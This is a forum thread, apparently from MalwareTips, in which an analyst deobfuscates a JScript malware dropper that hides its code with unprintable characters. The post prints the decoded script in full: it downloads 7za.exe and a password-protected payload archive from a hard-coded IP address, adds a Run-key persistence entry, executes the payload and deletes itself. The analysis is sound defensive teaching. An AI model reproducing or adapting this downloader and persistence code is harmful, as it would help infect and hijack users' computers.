Malware Analysis oracamento82323423723.js - uses some unprintable chars - zip file + zip tool downloaded

[DardiM]

From https://malwaretips.com/threads/3-1-17-9.67144/
Thanks to @Solarquest

oracamento82323423723.js

Why this sample ?

It uses unprintable char for its obfuscation / deobfuscation methods. and a big part of useless data.
This is the first time I will show this family here.
the problem with the unprintable chars, is that I will not be able to copy them here, so I will use some screenshots, and/or replace them on the analysis parts.

1) What it looks like :

You can see normal chars, and unprintable chars : the part that are with blank letters and a grey or black background.

2) simplification :

First thing I noticed :

The long part with :

var NuvVsNhfSWd=[34,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198........
...
]​

=> can be deleted : not used : only here to obfuscate a bit more.

The real important parts are on the new screenshot :

3) What are unprintable chars :

Each char has a code, that we name "char code", that can be given in decimal, hexadecimal, etc.
On a text file, or a file with content that can be read or write as file text, the char codes used as values correspond to a writable single char, with the aim to be understandable / readable.
But there are other values with another meaning, that are not used to give an understandable / readable char.

From NON PRINTABLE CHARACTERS :

We can see in this table non printable chars, with their code in DEC and HEX.​

Some of these chars appear on the sample I am analyzing currently.

For example, none of these char codes can represent a char. An editor will shows these chars with their special name, like SOH that means "Start of Heading", or RS that means "Record Separator" / "Up Arrow"

This is a part of a string used in the current sample :

​

SOH , STX, EOT, etc, => each one count as a single char, but are represented here like if it has 3 / 2 chars in white with grey background : their name, to tell us that they are unprintable chars.

If you click before SOH and then on the right arrow, the cursor will move after SOH in one step , and will be before STX (because it represents only one char, but unprintable).

The problem using this unprintable chars : if you try to open the sample on a debugger, or copy-paste the content on an editor : these unprintable chars will not appear.

Example : the same string I put above on the screenshot, copy-paste here :

üýþ#'@QZ^`|~";

You can see that the part from SOH to GS ... doesn't appear.
BUT this part is really present when I am on the MT editor, even if I can't see it : when the cursor reaches to the part where this unprintable chars should appear (but not appear), I click several times on the right arrow, and the cursor stays at the same place, until all unprintable chars have been taken into account => then, the cursor moves on last normal chars
ONCE the post is saved, these parts are lost...​

 

[DardiM]

4) Deobfuscation :

4-1) Analyse of the methods used :

I will put in these color the unprintable chars.

These is a simplified version, with the structure used : some strings have been replaced with big names that represent the real data

eval((function (s) {
var a, c, e, i, j, o = "", r, t = string_with_all_chars_to_be_deleted;
for (i = 0; i < s.length; i++) {

r = t + s[ i ][2];
a = s[ i ][1].split("RS");
for (j = a.length - 1; j >= 0; j--) {

s[ i ][0] = s[ i ][0].split(r.charAt(j)).join(a[j]);​

}
o += s[0];​

}
return o.replace(/US/g, "\"");
})(
[

[
obfuscated_string_part1 + obuscated_string_part2,
string_with_group_of_chars_to_replace_the _deleted_char_for_a_given_index,
""

=> 3 strings in a tab that is in s tab ​

]

=> tab in s tab

Why I name its tab s ?
because [ [....] ] => this part is given as parameter to the function, and we can see at the beginning : function (s) {​

]
));

Will show later the data (I can't copy-paste them here because of the unprintable chars)

Explanation of each parts :

eval(

=> to evaluate / run the bad part once deobfuscation has been made

​

(function(s){

=> function that will make the deobfuscation

​

var a,c,e,i,j,o="",r,t= string_with_all_chars_to_be_deleted;

=> some vars are initialized

​

for(i=0 ; i< s.length; i++)
{

=> loop from 0 to s.length : s is the parameter of the current function : the tab that contain a tab that contains 3 strings ...
=> I put in red (see the parameter passed, at the end of current code): its length : 1

=> the loop is useless because the operations before the second loop will be used one time ....
=> an obfuscated trick
=> i will only have one value :for the deobfuscation part : 1

​

r=t+s[ i ][2];

​

=> r = t + s[0][2]
=> s[0][2] : to access to the element of tab in s (that is also a tab), and its 3rd element (index : 2 => 3rd element)
=> "" : empty string

Then :

=> r = t + s[0][2]
=> r = t + ""
=> r = t
=> r & t : string_with_all_chars_to_be deleted

​

hahaha, another obfuscated part

​

a=s[ i ][1].split("RS");

=> s[0][1] : to access to the second string (index : 1 ) in the tab of strings :

​

string_with_group_of_chars_to_replace_the_deleted_char_for_a_given_index

=> s[ 0][1].split("RS") : cut this string to obtain an array of parts with the unprintable char represented by RS, as separator

first parts (see the screenshots on previous part) :

"$BJqo6Cm"
"¡x7Gvgx"
"¢eFsio"
"older"
"Name"
"£r("
" \\\\"
"f¤¥+US§US+"
"=new Ac"
"©tiveX"
"ªObje"
"var"
"US,US"
etc,

You can see that the unprintable char represented by US is present

​

for(j=a.length - 1;j>=0;j--)
{

=> real loop : will use all part on the r string and a array, but beginning by the end !

​

s[ i ][0]=s[ i ][0].split(r.charAt(j)).join(a[j]);

=> s[ 0 ][0]=s[ 0 ][0].split(r.charAt(j)).join(a[j]);

not to hard to understand :

s[ 0 ][0] is : obfuscated_string_part1 + obuscated_string_part2 : the obfuscated scripted part that will be evaluated / run by the function eval, once deobfuscated.

​

​

For the current j index :

r.charAt(j) : retrieves the char to be replace on the obfuscated string, from the first string :

a[j] : retrieves from the array a the group of char to put at the place of the removed char

first parts (see the screenshots on previous part) :

"$BJqo6Cm"
"¡x7Gvgx"
"¢eFsio"
"older"
"Name"
"£r("
" \\\\"
"f¤¥+US§US+"
"=new Ac"
"©tiveX"
"ªObje"
"var"
"US,US"
etc,

​

s[ 0 ][0] is overwritten.

The replacement is made by splitting the whole string with the char, and joining the parts by adding the group

Example :

"h$e$l$l$o" = > to replace all "$" by "-" => "h$e$l$l$o".split("$").join("-")
first step => split("$") : temporary array : "h" "e" "l" "l" "o"
second step => .join("-") : "h-e-l-l-o"
​

This method is done in the current loop for all parts in the array a​

}
o+=s[ i ][0];

=> At the end, o contains the string almost deobfuscated : only the unprintable char represented by US are presents​

}
return o.replace(/US/g,"\"");

​

=> return o.replace(/US/g,"\"");
=> return the completely deobfuscated string, US has been replace by \"​

})(

[

[

obfuscated_string_part1 + obuscated_string_part2,
string_with_group_of_chars_to_replace_the _deleted_char_for_a_given_index,
""
=> 3 strings in the tab in s tab ​

]

=> tab in s tab​

]

=> s
=> to access to one of the string : s[0][index_of_the_string]​

)
);

​

Conclusion : similar to a multi replacement of char by groups of chars.

=> an obfuscated string

Using a loop, for a current index :

​

=> a string of chars that will be used to know what char to replace
=> an array of strings that will be used to replace the char above char

​

At the end : the "deobfuscated" real bad part

​

4-2 ) What looks like the deobfuscated part :

As always, I modified some parts to avoid copy-paste => run => infection

As a string :

"$_BJqo6Cmx7GvgxeFsior=function(n){if(typeof($BJqo6Cmx7GvgxeFsior.list[n])==\"string\")return $BJqo6Cmx7GvgxeFsior.list[n].split(\"\").reverse().join(\"\");return $BJqo6Cmx7GvgxeFsior.list[n]};$BJqo6Cmx7GvgxeFsior.list=[\"PTTHLMX.2LMXSM\",\"exe.T1973HDA\",\" x exe.az7\",\"gpj.rajcem/baf/551.551.991.821//:ptth\",\"tcejbOmetsySeliF.gnitpircS\",\"htaP\\\\yrrebkcalB\\\\yrtsigeRwoL\\\\rerolpxE tenretnI\\\\tfosorciM\\\\erawtfoS\\\\RESU_TNERRUC_YEKH\",\"qrAemaN\\\\yrrebkcalB\\\\yrtsigeRwoL\\\\rerolpxE tenretnI\\\\tfosorciM\\\\erawtfoS\\\\RESU_TNERRUC_YEKH\",\"llehS.tpircSW\",\"%ATADPPA%\",\"emaN\\\\yrrebkcalB\\\\yrtsigeRwoL\\\\rerolpxE tenretnI\\\\tfosorciM\\\\erawtfoS\\\\RESU_TNERRUC_YEKH\",\"\\\\nuR\\\\noisreVtnerruC\\\\swodniW\\\\tfosorciM\\\\erawtfoS\\\\RESU_TNERRUC_YEKH\",\"txt.pizolelarap/baf/551.551.991.821//:ptth\",\"piz.pmeT\",\"llehS.tpircsW\",\"T1973HDA\",\"maertS.BDODA\"];var c=new ActiveXObject($BJqo6Cmx7GvgxeFsior(7)),d=c.ExpandEnvironmentStrings($BJqo6Cmx7GvgxeFsior(8)),f=$BJqo6Cmx7GvgxeFsior(6),g=new ActiveXObject($BJqo6Cmx7GvgxeFsior(7));try{var ArqName=\"\",EXEName=\"\";ArqName=g.regread(f)}catch(e){}(ArqName===\"\")?(EXEName=n(10),ArqName=EXEName,EXEName=EXEName+\".exe\",g.RegWrite($BJqo6Cmx7GvgxeFsior(6),ArqName),g.RegWrite($BJqo6Cmx7GvgxeFsior(9),EXEName)):(EXEName=ArqName+\".exe\",g.RegWrite($BJqo6Cmx7GvgxeFsior(6),ArqName),g.RegWrite($BJqo6Cmx7GvgxeFsior(9),EXEName));f=$BJqo6Cmx7GvgxeFsior(5);try{var folderName=\"\";folderName=g.regread(f)}catch(e){}(folderName===\"\")?(folderName=d+\"\\\\\"+n(10),g.RegWrite($BJqo6Cmx7GvgxeFsior(5),folderName),g.RegWrite($BJqo6Cmx7GvgxeFsior(10)+EXEName,folderName+\"\\\\\"+EXEName)):(g.RegWrite($BJqo6Cmx7GvgxeFsior(5),folderName),g.RegWrite($BJqo6Cmx7GvgxeFsior(10)+EXEName,folderName+\"\\\\\"+EXEName));var h=new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));if(!h.FolderExists(folderName)){var objFolder=h.CreateFolder(folderName);objFolder.Attributes=34}var i=\"\";i=folderName+\"\\\\\"+EXEName;var j=new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));(j.FileExists(i))?(j.DeleteFile(i)):0;m($BJqo6Cmx7GvgxeFsior(11),folderName+\"\\\\7za.exe\");m($BJqo6Cmx7GvgxeFsior(3),folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(12));var k=\"\";k=\"102030\";var l=\"\";l=folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(12);Str7zip=folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(2)+l+\" -p\"+k+\" -o\"+folderName+\" -y\";unzip=new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));unzip.Run(Str7zip,1,1);(j.FileExists(folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(1)))?(j.MoveFile(folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(1),i)):0;(j.FileExists(folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(14)))?(j.MoveFile(folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(14),folderName+\"\\\\\"+ArqName)):0;WSHELL=new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));WSHELL.Exec(i);var h=new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));h.DeleteFile(WScript.ScriptFullName);function m(o,p){var q=new ActiveXObject($BJqo6Cmx7GvgxeFsior(0));q.open(\"GET\",o,false);q.send();(q.Status==200)?(objStream=new ActiveXObject($BJqo6Cmx7GvgxeFsior(15)),objStream.open(),objStream.Type=1,objStream.Write(q.responseBody),objStream.Position=0,objStream.SaveToFile(p,2),objStream.Close()):0}function n(x){var s=\"\";while(s.length<x&&x>0){var r=Math.random();s+=(r<0.1?Math.floor(r*100):String.fromCharCode(Math.floor(r*26)+(r>0.5?97:65)))}return s}"

After some formatting, the code that will be run : we can see that it is written in a obfuscated way

$_BJqo6Cmx7GvgxeFsior = function(n) {
    if (typeof($BJqo6Cmx7GvgxeFsior.list[n]) == "string") return $BJqo6Cmx7GvgxeFsior.list[n].split("").reverse().join("");
    return $BJqo6Cmx7GvgxeFsior.list[n]
};
$BJqo6Cmx7GvgxeFsior.list = ["PTTHLMX.2LMXSM", "exe.T1973HDA", " x exe.az7", "gpj.rajcem/baf/551.551.991.821//:ptth", "tcejbOmetsySeliF.gnitpircS", "htaP\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "qrAemaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "llehS.tpircSW", "%ATADPPA%", "emaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "txt.pizolelarap/baf/551.551.991.821//:ptth", "piz.pmeT", "llehS.tpircsW", "T1973HDA", "maertS.BDODA"];
var c = new ActiveXObject($BJqo6Cmx7GvgxeFsior(7)),
    d = c.ExpandEnvironmentStrings($BJqo6Cmx7GvgxeFsior(8)),
    f = $BJqo6Cmx7GvgxeFsior(6),
    g = new ActiveXObject($BJqo6Cmx7GvgxeFsior(7));
try {
    var ArqName = "",
        EXEName = "";
    ArqName = g.regread(f)
} catch (e) {}(ArqName === "") ? (EXEName = n(10), ArqName = EXEName, EXEName = EXEName + ".exe", g.RegWrite($BJqo6Cmx7GvgxeFsior(6), ArqName), g.RegWrite($BJqo6Cmx7GvgxeFsior(9), EXEName)) : (EXEName = ArqName + ".exe", g.RegWrite($BJqo6Cmx7GvgxeFsior(6), ArqName), g.RegWrite($BJqo6Cmx7GvgxeFsior(9), EXEName));
f = $BJqo6Cmx7GvgxeFsior(5);
try {
    var folderName = "";
    folderName = g.regread(f)
} catch (e) {}(folderName === "") ? (folderName = d + "\\" + n(10), g.RegWrite($BJqo6Cmx7GvgxeFsior(5), folderName), g.RegWrite($BJqo6Cmx7GvgxeFsior(10) + EXEName, folderName + "\\" + EXEName)) : (g.RegWrite($BJqo6Cmx7GvgxeFsior(5), folderName), g.RegWrite($BJqo6Cmx7GvgxeFsior(10) + EXEName, folderName + "\\" + EXEName));
var h = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));
if (!h.FolderExists(folderName)) {
    var objFolder = h.CreateFolder(folderName);
    objFolder.Attributes = 34
}
var i = "";
i = folderName + "\\" + EXEName;
var j = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));
(j.FileExists(i)) ? (j.DeleteFile(i)) : 0;
m($BJqo6Cmx7GvgxeFsior(11), folderName + "\\7za.exe");
m($BJqo6Cmx7GvgxeFsior(3), folderName + "\\" + $BJqo6Cmx7GvgxeFsior(12));
var k = "";
k = "102030";
var l = "";
l = folderName + "\\" + $BJqo6Cmx7GvgxeFsior(12);
Str7zip = folderName + "\\" + $BJqo6Cmx7GvgxeFsior(2) + l + " -p" + k + " -o" + folderName + " -y";
unzip = new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));
unzip.Run(Str7zip, 1, 1);
(j.FileExists(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(1))) ? (j.MoveFile(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(1), i)) : 0;
(j.FileExists(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(14))) ? (j.MoveFile(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(14), folderName + "\\" + ArqName)) : 0;
WSHELL = new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));
WSHELL.Exec(i);
var h = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));
h.DeleteFile(WScript.ScriptFullName);

function m(o, p) {
    var q = new ActiveXObject($BJqo6Cmx7GvgxeFsior(0));
    q.open("GET", o, false);
    q.send();
    (q.Status == 200) ? (objStream = new ActiveXObject($BJqo6Cmx7GvgxeFsior(15)), objStream.open(), objStream.Type = 1, objStream.Write(q.responseBody), objStream.Position = 0, objStream.SaveToFile(p, 2), objStream.Close()) : 0
}

function n(x) {
    var s = "";
    while (s.length < x && x > 0) {
        var r = Math.random();
        s += (r < 0.1 ? Math.floor(r * 100) : String.fromCharCode(Math.floor(r * 26) + (r > 0.5 ? 97 : 65)))
    }
    return s
}

Just show you a funny part :

[
     "PTTHLMX.2LMXSM",

     "exe.T1973HDA",

     " x exe.az7",

      "gpj.rajcem/baf/551.551.991.821//:ptth",

     "tcejbOmetsySeliF.gnitpircS", "htaP\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE   tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",

     "qrAemaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "llehS.tpircSW", "%ATADPPA%",

     "emaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",

     "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",
     "txt.pizolelarap/baf/551.551.991.821//:ptth",
      "piz.pmeT",
      "llehS.tpircsW",
      "T1973HDA",
     "maertS.BDODA"
];

=> all important string reversed

5) Quick analysis :

After have Flipped each string

Try here : Reverse Text Generator – Text Mechanic™​

Interesting string : almost all to understand what is done

0 - "MSXML2.XMLHTTP"
1 - "ADH3791T.exe"
2 - "7za.exe x "
3 - "http ://128.199.155.155/fab/mecjar.jpg"
4 - "Scripting.FileSystemObject"
5 - "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Path"
6 - "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\NameArq"
7 - "WScript.Shell"
8 - "%APPDATA%"
9 - "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Name"
10 - "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
11 - "http ://128.199.155.155/fab/paralelozip.txt"
12 - "Temp.zip"
13 - "Wscript.Shell"
14- "ADH3791T"
15 - "ADODB.Stream"​

http ://128.199.155.155/fab/paralelozip.txt

=> an exe file : 7za.exe => command line zip utility​

http ://128.199.155.155/fab/mecjar.jpg

=> a zip file, password protected​

Inside : 3 files :

ADH3791T - 3839 KB
ADH3791T.exe => the PAYLOAD run - 406 kB
GdanOff.dll - 146 KB

(I will show the names used in the following parts)

=> 14/56 : a variant of Win32/Injector.DJJP

Antivirus scan for 99b023d6b5a116474e18c2da847fa2bdb110c1d409b7dbfb561872d7d3e5b801 at 2017-01-04 14:08:04 UTC - VirusTotal​

6) Each part in details :

$BJqo6Cmx7GvgxeFsior = function {
if (typeof($BJqo6Cmx7GvgxeFsior.list[n]) == "string")
return $BJqo6Cmx7GvgxeFsior.list[n].split("").reverse().join("");

=> flips the string given as parameter : index

​

return $BJqo6Cmx7GvgxeFsior.list[n]

​

=> not a string ? => returns the element without reversing it​

};

=> function that returns the reversed string asked as parameter, from the list $BJqo6Cmx7GvgxeFsior.list ​

​

$BJqo6Cmx7GvgxeFsior.list = [

"PTTHLMX.2LMXSM",
"exe.T1973HDA",
" x exe.az7",
"gpj.rajcem/baf/551.551.991.821//tth",
"tcejbOmetsySeliF.gnitpircS",
"htaP\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "qrAemaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",
"llehS.tpircSW",
"%ATADPPA%",
"emaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "txt.pizolelarap/baf/551.551.991.821//tth",
"piz.pmeT",
"llehS.tpircsW",
"T1973HDA",
"maertS.BDODA"​

];

=> list of string that will be used for important parts : creates the ActiveX objects, write registry keys, download the files that will be used for the infection, etc​

var c = new ActiveXObject($BJqo6Cmx7GvgxeFsior(7)),

=> new ActiveXObject( "wScripT.shelL")
=> creates a shell object (used for example to run some files)​

d = c.ExpandEnvironmentStrings($BJqo6Cmx7GvgxeFsior(8)),

=> $BJqo6Cmx7GvgxeFsior(8) => gets : "%ATADPPA%" string
=> uses the shell object to get the "%ATADPPA%" path

=> Example : "C:\Users\\DardiM\AppData\\Roaming"​

f = $BJqo6Cmx7GvgxeFsior(6),

=> gets the string : "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\NameArq"​

g = new ActiveXObject($BJqo6Cmx7GvgxeFsior(7));

=> $BJqo6Cmx7GvgxeFsior(7) : "wScripT.shelL"
=> creates another shell object (used for example to run some files)​

try {

var ArqName = "",
EXEName = "";
​

ArqName = g.regread(f)

=> tries to read the value of the key from the registry​

} catch (e) {

=> if an error was thrown when it tried to read the key, we are here ​

}

(ArqName === "") ? (

=> like a if then​

=> value : empty string (the value that was put before the try to read the registry key) => the key doesn't exist (the attempt to read the key was failed)​

EXEName = n(10),

=> n : function that builds a random name : 10 : the number of char wanted

=> Example : "IxnHFxw1v4"​

​

ArqName = EXEName,

EXEName = EXEName + ".exe",

=> Example : "IxnHFxw1v4.exe"

​

g.RegWrite($BJqo6Cmx7GvgxeFsior(6), ArqName),

=> $BJqo6Cmx7GvgxeFsior(6) :

"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\NameArq"

=> creates the reg key : example : "IxnHFxw1v4"

​

g.RegWrite($BJqo6Cmx7GvgxeFsior(9), EXEName)

=> $BJqo6Cmx7GvgxeFsior(9) :

"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Name"

=> creates the reg key : example : "IxnHFxw1v4.exe"​

)
: => like a else
(

=> here if g.regread(f) returned a value (ArqName not equal to "")​

EXEName = ArqName + ".exe",

=> it used the retrieved ArqName value to built the exe name

g.RegWrite($BJqo6Cmx7GvgxeFsior(6), ArqName),
g.RegWrite($BJqo6Cmx7GvgxeFsior(9), EXEName)

=> creates the reg keys (same keys than in the then part)​

);

( ... === ?) part_do_do_if_true : part_to_do_if_false

=> a method that is similar to :

if (....) {
...
...
}else {
...
...
}​

f = $BJqo6Cmx7GvgxeFsior(5);

=> "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Path"​

Now, similar method used, for the path :

try {
var folderName = "";
folderName = g.regread(f)

=> tries to retrieve the path from the registry (exists if already infected)​

} catch (e) {

}
(folderName === "") ? (

folderName = d + "\\" + n(10),

=> creates a random folder name and put the %APPDATA% path found in previous part at the beginning

=> Example : "C:\Users\\DardiM\AppData\Roaming\KvDnowGyxH"

​

g.RegWrite($BJqo6Cmx7GvgxeFsior(5), folderName),

=> creates the key

g.RegWrite($BJqo6Cmx7GvgxeFsior(10) + EXEName, folderName + "\\" + EXEName)

=> creates the entry in :

"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
=> set the path of the exe file
=> to run the exe file (the malware) at run time.​

) :
(

the script reach here if "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Path" already exists

​

=> does the same as above, but using the name retrieved from the registry

​

g.RegWrite($BJqo6Cmx7GvgxeFsior(5), folderName),
g.RegWrite($BJqo6Cmx7GvgxeFsior(10) + EXEName, folderName + "\\" + EXEName)​

);

var h = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));

=> new ActiveXObject("Scripting.FileSystemObject")
=> to manipulate file / folder​

if (!h.FolderExists(folderName)) {

=> tests if the folder doesn't exist​

var objFolder = h.CreateFolder(folderName);

=> creates the folder

Example : "C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH"​

objFolder.Attributes = 34

=> set the attributes of the created folder to 34 => 0x22 (Hexadecimal value):

0x20 Archive
0x2 : Hidden​

}
var i = "";
i = folderName + "\\" + EXEName;

=> path of the exe file​

var j = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));

=> new ActiveXObject("Scripting.FileSystemObject")
=> to manipulate file / folder​

​

(j.FileExists(i)) ? (j.DeleteFile(i)) : 0;

=> if the exe file already exists : delete it​

m($BJqo6Cmx7GvgxeFsior(11), folderName + "\\7za.exe");

=> m : download function :

=> download : http ://128.199.155.155/fab/paralelozip.txt
=> saves it as : folderName + "\\7za.exe"​

m($BJqo6Cmx7GvgxeFsior(3), folderName + "\\" + $BJqo6Cmx7GvgxeFsior(12));

=> download : http ://128.199.155.155/fab/mecjar.jpg

​

=> saves it as : folderName + "\\Temp.zip"​

var k = "";
k = "102030";

=> password of the zip file !!!
​

var l = "";

l = folderName + "\\" + $BJqo6Cmx7GvgxeFsior(12);

=> folderName + "\\Temp.zip"​

Str7zip = folderName + "\\" + $BJqo6Cmx7GvgxeFsior(2) + l + " -p" + k + " -o" + folderName + " -y";

=> the command line to be used to unzip the file :

Example :

=> "C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH\\7za.exe x C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH\\Temp.zip -p102030 -oC:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH -y"​

unzip = new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));

=> new ActiveXObject( "Wscript.Shell")
=> creates a shell object​

unzip.Run(Str7zip, 1, 1);

=> uses its run method with the above command line
=> unzip the archive

(j.FileExists(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(1))) ? (j.MoveFile(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(1), i)) : 0;

=> file ADH3791T.exe exists ?

=> if yes : file renamed with the random name created or retrieved from the registry​

Example :

"C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH\\IxnHFxw1v4.exe"
​

(j.FileExists(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(14))) ? (j.MoveFile(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(14), folderName + "\\" + ArqName)) : 0;

=> file ADH3791T exists ?​

=> if yes : file is renamed with the random name created or retrieved from the registry

​

Example :

"C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH\\IxnHFxw1v4"​

The folder once all has been done :
​

WSHELL = new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));

=> creates another shell object (they likes creating several time the same object ...)​

WSHELL.Exec(i);

=> runs the malware

Example :​

"C:\Users\\DardiM\AppData\Roaming\KvDnowGyxH\IxnHFxw1v4.exe"​

Summary :

- KvDnowGyxH : random folder created, with attributes Archive + Hidden
- IxnHFxw1v4 : a file without extension, extracted from the archive, once renamed
- IxnHFxw1v4.exe : the exe file extracted from the archive, once renamed
Its value is on the run part of the registry : PC run => Malware run
- GdanOff.dll​

var h = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));

=> new ActiveXObject("Scripting.FileSystemObject")
=> creates another fso object to manipulate files / folder​

h.DeleteFile(WScript.ScriptFullName);

=> deletes the current running script file​

Here, the functions used :

The downloader
function m(o, p) {
var q = new ActiveXObject($BJqo6Cmx7GvgxeFsior(0));

=> new ActiveXObject("MSXML2.XMLHTTP")
=> creates an http object to get the remote files​

q.open("GET", o, false);

=> opens a connection : o is the URL (first parameter)​

q.send();

=> sends the http request​

(q.Status == 200) ? (

=> if the request status is OK

objStream = new ActiveXObject($BJqo6Cmx7GvgxeFsior(15)),

=> new ActiveXObject(""ADODB.Stream"")
=> creates an object stream to save the data received by the http request

​

objStream.open(),

=> opens the stream object

​

objStream.Type = 1,

=> 1 : data will be considered as binary

​

objStream.Write(q.responseBody),

=> writes on the stream the data received

​

objStream.Position = 0,

=> after the write, the position has changed : sets it to 0

​

objStream.SaveToFile(p, 2),

=> saves the data to a file (path is the second parameter of current function)

​

objStream.Close()

=> closes the stream object​

) : 0​

}

The function that returns a random name : length as parameter
function n(x) {
var s = "";
while (s.length < x && x > 0) {

=> a loop while until the name has the length required (parameter x)
​

var r = Math.random();

=> random number between 0 and 1​

s += (r < 0.1 ? Math.floor(r * 100) : String.fromCharCode(Math.floor(r * 26) + (r > 0.5 ? 97 : 65)))

=> builds the random name​

}
return s

=> returns the random name​

}

Reminder (already talk about it on the part 5) )

http ://128.199.155.155/fab/paralelozip.txt

=> an exe file : 7za.exe => command line zip utility​

http ://128.199.155.155/fab/mecjar.jpg

=> a zipped file, password protected​

Inside : 3 files :

ADH3791T - 3839 KB
ADH3791T.exe => the PAYLOAD run - 406 kB
GdanOff.dll - 146 KB

ADH3791T and ADH3791T.exe are renamed after extraction

Example : IxnHFxw1v4 and IxnHFxw1v4.exe (random name)​

=> 14/56 : a variant of Win32/Injector.DJJP

Antivirus scan for 99b023d6b5a116474e18c2da847fa2bdb110c1d409b7dbfb561872d7d3e5b801 at 2017-01-04 14:08:04 UTC - VirusTotal

 

[askmark]

A great explanation of what non printable characters are.
Looking forward to part 2

 

[DardiM]

A great explanation of what non printable characters are.
Looking forward to part 2

Thanks

Part 2 just posted

 

[askmark]

part 2 just posted

I think you posted it while i was reading part 1
I will now read part 2

 

[DardiM]

I think you posted it while i was reading part 1
I will now read part 2

Yes, hahaha

 

[DardiM]

part 2 updated with the complete explanation of the real part

 

[Svoll]

part 2 updated with the complete explanation of the real part

Thank you for the explanations! Hugs!!!!! I was kinda lost when I first encountered the reverse strings, now that you have decoded it, I can see what it does.

 

[DardiM]

Thank you for the explanations! Hugs!!!!! I was kinda lost when I first encountered the reverse strings, now that you have decoded it, I can see what it does.

Thanks
I have also put with this last part a great link for an online tool, to reverse / flip word /sentence, etc

 

[AtlBo]

